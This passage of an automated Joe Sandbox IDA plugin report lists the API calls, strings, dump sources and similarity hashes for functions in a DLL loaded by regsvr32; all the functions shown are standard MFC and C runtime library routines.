Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
__lock.LIBCMT ref: 10034688
InterlockedIncrement.KERNEL32(?), ref: 10034695
__lock.LIBCMT ref: 100346A9
___addlocaleref.LIBCMT ref: 100346C7

Strings

KERNEL32.DLL, xrefs: 1003461C, 10034621, 1003462C
EncodePointer, xrefs: 1003464A
DecodePointer, xrefs: 1003465E

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC

Strings

KERNEL32, xrefs: 10020C63
CreateActCtxA, xrefs: 10020C7F
ActivateActCtx, xrefs: 10020C94
ReleaseActCtx, xrefs: 10020C87
DeactivateActCtx, xrefs: 10020CA1

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17

Uniqueness

Uniqueness Score: -1.00%

Function 10043A65, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043A6C
std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
int.LIBCPMT ref: 10043A8D

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043A96
ctype.LIBCPMT ref: 10043AB0
std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
__CxxThrowException@8.LIBCMT ref: 10043AD2
std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8

Strings

bad cast, xrefs: 10043ABC

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 2535038987-3145022300
Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799

Uniqueness

Uniqueness Score: -1.00%

Function 10043C84, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043C8B
std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
int.LIBCPMT ref: 10043CAC

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043CB5
codecvt.LIBCPMT ref: 10043CCF
std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
__CxxThrowException@8.LIBCMT ref: 10043CF1
std::locale::facet::_Incref.LIBCPMT ref: 10043D01
std::locale::facet::facet_Register.LIBCPMT ref: 10043D07

Strings

bad cast, xrefs: 10043CDB

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 577375395-3145022300
Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798

Uniqueness

Uniqueness Score: -1.00%

Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10023423
FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
LoadResource.KERNEL32(?,00000000), ref: 1002345E

Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C

LockResource.KERNEL32(?,00000024,1000150C,00000000,71FAB912), ref: 1002346F
GetDesktopWindow.USER32 ref: 100234A2
IsWindowEnabled.USER32(?), ref: 100234B0
EnableWindow.USER32(?,00000000), ref: 100234BF

Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,71FAB912), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,71FAB912), ref: 100235D9

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10028C9F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10028CA6
GetPropA.USER32 ref: 10028CB5
CallWindowProcA.USER32 ref: 10028D0F

Part of subcall function 10027B1C: GetWindowRect.USER32 ref: 10027B46

SetWindowLongA.USER32(?,000000FC,?), ref: 10028D36
RemovePropA.USER32 ref: 10028D3E
GlobalFindAtomA.KERNEL32 ref: 10028D45
GlobalDeleteAtom.KERNEL32(?), ref: 10028D4F
CallWindowProcA.USER32 ref: 10028DA3

Strings

AfxOldWndProc423, xrefs: 10028CAE, 10028CB3, 10028D3C, 10028D44

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 1002B9C8
GetStockObject.GDI32(0000000D), ref: 1002B9D0
GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
GetDC.USER32(00000000), ref: 1002B9EC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
ReleaseDC.USER32 ref: 1002BA18

Strings

System, xrefs: 1002B9C3, 1002BA2D

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 1001E7D5
SendMessageA.USER32 ref: 1001E7FB
SendMessageA.USER32 ref: 1001E815
SendMessageA.USER32 ref: 1001E839
SendMessageA.USER32 ref: 1001E86E
SendMessageA.USER32 ref: 1001E888
SendMessageA.USER32 ref: 1001E8A4
SendMessageA.USER32 ref: 1001E8BD
SendMessageA.USER32 ref: 1001E8DB

Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10001982

Strings

ios_base::failbit set, xrefs: 10001A1E
ios_base::eofbit set, xrefs: 10001A88
ios_base::badbit set, xrefs: 100019A3

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002104C
lstrcmpA.KERNEL32(?,?), ref: 10021058
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
GlobalLock.KERNEL32 ref: 1002109C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1

Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1002A98E, Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 1002A99D
GetSystemMetrics.USER32 ref: 1002A9A4
GetSystemMetrics.USER32 ref: 1002A9AB
GetSystemMetrics.USER32 ref: 1002A9B5
GetDC.USER32(00000000), ref: 1002A9BF
GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
ReleaseDC.USER32 ref: 1002A9E0

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002B878
lstrlenA.KERNEL32(?), ref: 1002B8C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
_wcslen.LIBCMT ref: 1002B901

Strings

System, xrefs: 1002B874

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 100270EF
PeekMessageA.USER32 ref: 10027113
UpdateWindow.USER32(?), ref: 1002712E
SendMessageA.USER32 ref: 1002714F
SendMessageA.USER32 ref: 10027167
UpdateWindow.USER32(?), ref: 100271AA
PeekMessageA.USER32 ref: 100271DB

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10

Uniqueness

Uniqueness Score: -1.00%

Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10027705
SendMessageA.USER32 ref: 1002772E
GetWindowLongA.USER32 ref: 10027740
GetWindowLongA.USER32 ref: 10027751
SetWindowLongA.USER32(?,000000FC,?), ref: 1002776D

Strings

,, xrefs: 10027724

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002245E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10022468
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1002254E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002256B
RegCloseKey.ADVAPI32(?), ref: 1002258B
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100225A6

Strings

Software\, xrefs: 100224CC

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
